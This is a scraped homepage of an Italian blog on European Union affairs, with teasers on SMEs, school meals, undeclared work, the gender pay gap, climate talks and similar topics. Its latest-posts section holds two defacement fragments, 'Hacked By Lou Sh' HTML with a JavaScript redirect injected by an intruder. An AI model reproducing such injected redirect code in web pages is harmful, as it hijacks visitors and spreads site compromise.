EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Analisi ed approfondimenti

it

Il 2013 è stato un anno difficile per la ripresa economica delle PMI europee: nonostante alcuni segnali di una lenta risalita finanziaria, la ripresa appare assai instabile e non si è ancora assestata del tutto. La Commissione europea lo ha annunciato il 3 ottobre attraverso le schede informative relative allo Small Business Act for Europe (SBA), il programma europeo a sostegno delle piccole e medie imprese.

Per ciò che riguarda l’ambito occupazionale, rispetto al 2008 la percentuale di occupazione si è assestata sul 2,16% in meno e questo ha portato ad una disoccupazione pari a 1,9 milioni di lavoratori. Inoltre va sottolineato come a causa della crisi economica mondiale e del calo dell’inflazione (...)

it

Dalla relazione, realizzata con l’ausilio del gruppo Ue di alto livello sull’alimentazione e l’attività fisica a sostegno della strategia Ue 2007 per l’alimentazione, il sovrappeso e l’obesità e per il piano d’azione dell’Ue sull’obesità infantile 2014-2020, emerge quanto per i paesi europei sia importante e fondamentale il sostegno della ristorazione scolastica per la salute, lo sviluppo e i risultati scolastici dei bambini.

Lo studio ha analizzato i dati dei 28 Stati membri dell’Ue più Norvegia e Svizzera, evidenziando come le disposizioni variano da paese a paese. Questo perché ogni qual volta si presenta la necessità di stabilire quantità e menù dei cibi da offrire ai più piccoli, le decisioni sono volontarie e non (...)

it

Lo scorso 24 marzo sono stati pubblicati i dati Eurobarometro sul lavoro nero in Europa. Le percentuali sono chiare: un cittadino europeo su dieci (11%) ha effettuato acquisti o beneficiato di servizi grazie al lavoro nero ed il 4% riconosce di aver percepito un salario dopo aver prestato il proprio lavoro in nero.

La questione non finisce qui, perché anche una piccola seppur importante fetta di popolazione, il 3%, ha dichiarato di aver ricevuto del denaro in nero al di fuori della propria busta paga. Per poter scongiurare l’ipotesi che queste pratiche possano avanzare ulteriormente, ad aprile la (...)

it

Grazie al decreto, rifugiati e beneficiari di protezione sussidiaria potranno ottenere il permesso di soggiorno UE per soggiornanti di lungo periodo.

Con un ritardo ingiustificabile (il termine ultimo per il recepimento era previsto per il 20 maggio 2013), il 13 febbraio scorso l’Italia ha finalmente recepito la direttiva 2011/51/UE, che estende ai beneficiari di protezione internazionale la possibilità di ottenere il permesso di soggiorno UE (...)

it

In 2013, the United Nations did something unprecedented. It set up the UN Major Group for Children and Youth (MGCY) Policy Strategy Group. This Policy Strategy Group’s goal is to help define the World We Want Consultations on post-2015. In 2015 a global development plan called Millennium Development Goals (MDGs) will expire and governments around the world will develop a new plan to define the world’s next global development agenda set to begin in 2015

The UN Major Group for Children and Youth is a voice of children and youth and is aimed at youth bellow the age of 30 as a platform to amplify youth voices in the new development agenda.

As a youth I have been very interested in listening to the voices of my peers as expressed on the UN (...)

it

Il 9 dicembre la Commissione europea ha pubblicato una relazione che traccia un bilancio circa l’attuale atteggiamento degli Stati membri in materia di parità tra i sessi in ambito retributivo. Il dato evidenziato è la percentuale ancora troppo elevata del gender pay gap, ovvero della differenza che intercorre tra le modalità di retribuzione attuate per gli uomini e quelle utilizzate per le donne. Il bilancio dimostra che il divario è diminuito del 1.1% tra il 2008 e il 2011, arrestandosi al 16.2%. Tale percentuale è rimasta invariata rispetto all’anno scorso e questo testimonia quanto la disparità di retribuzione tra i sessi sia ancora un problema su cui l’UE deve lavorare.

Le aziende private e pubbliche, gli enti, le istituzioni stentano ancora a rendere effettivo il principio di parità. Eppure, l’Unione europea ha dedicato da sempre molte attenzioni a questo argomento, considerato come uno dei suoi principi fondanti. Infatti, l’articolo 199 del trattato del marzo (...)

it

Basta osservare, anche solo di sfuggita, le facce stralunate dei turisti stranieri che chiedono informazioni per le strade italiane, per capire che noi italiani non siamo particolarmente a nostro agio con l’inglese. Non è raro, infatti, che i poveri malcapitati si trovino di fronte a novelli Totò e Peppino che gli rispondono alla “Noio volevom savuar”.

È la lingua del business, della tecnologia e delle scienze, la lingua “franca” con cui il mondo comunica: eppure gli italiani l’inglese non riescono proprio a padroneggiarlo. A dirlo è un’importante ricerca realizzata da Education First, scuola internazionale di inglese, condotta nel corso di 6 anni, (...)

it

Sembra che le decisioni diplomatiche internazionali siano più lente dei cambiamenti climatici. Sedici COP dopo la terza, la storica Conferenza di Kyoto, esperti, tecnici, diplomatici e politici da tutto il mondo si sono riuniti a Varsavia per discutere di riscaldamento globale. Nessun accordo rilevante è stato raggiunto. Tutti sanno però quando e dove rivedersi per la ventesima Conferenza sul clima.

Nella storia della diplomazia internazionale, piena di summit e incontri nati con i migliori auspici, spesso accade che le buone intenzioni si trasformino, di fatto, in grandi delusioni. La storia del Protocollo di Kyoto, i cui esiti sono inferiori alle aspettative, non è un’eccezione.

Kyoto, (...)

it

Le controversie di modesta entità sono i procedimenti giudiziali il cui valore è fissato, da un precedente regolamento europeo (il regolamento n. 861/2007) a massimo 2000 euro, che coinvolgono cittadini di due Stati membri diversi, che hanno bisogno di un modo rapido e poco costoso di giungere alla soluzione della loro lite.

L’esempio che la Commissione ha in mente è questo: fornire una strada “cheap” per coloro che vorrebbero indietro il proprio denaro dopo aver acquistato un televisore online da un venditore straniero, ma non averlo mai ricevuto. Quasi nessuno, in tempi di crisi, si imbarcherebbe in una causa da (...)

it

La Pac, Politica agricola comune dell’Unione europea, nasce per sostenere gli agricoltori nella fornitura di beni primari che più di 500 milioni di persone utilizzano. Tra questi non mancano il pane, il latte, la carne, il vino e i vestiti. La produzione di essi è indispensabile che segua precise procedure non solo a livello quantitativo ma soprattutto qualitativo.

Tutto questo deve rientrare ovviamente nel progetto di salvaguardare l’ecosostenibilità e i cambiamenti climatici che sempre di più ci riguardano da vicino. La campagna di sensibilizzazione messa in campo dall’UE “Abbiamo a cuore le nostre radici” si prefissa l’obiettivo di aiutare e sostenere gli (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France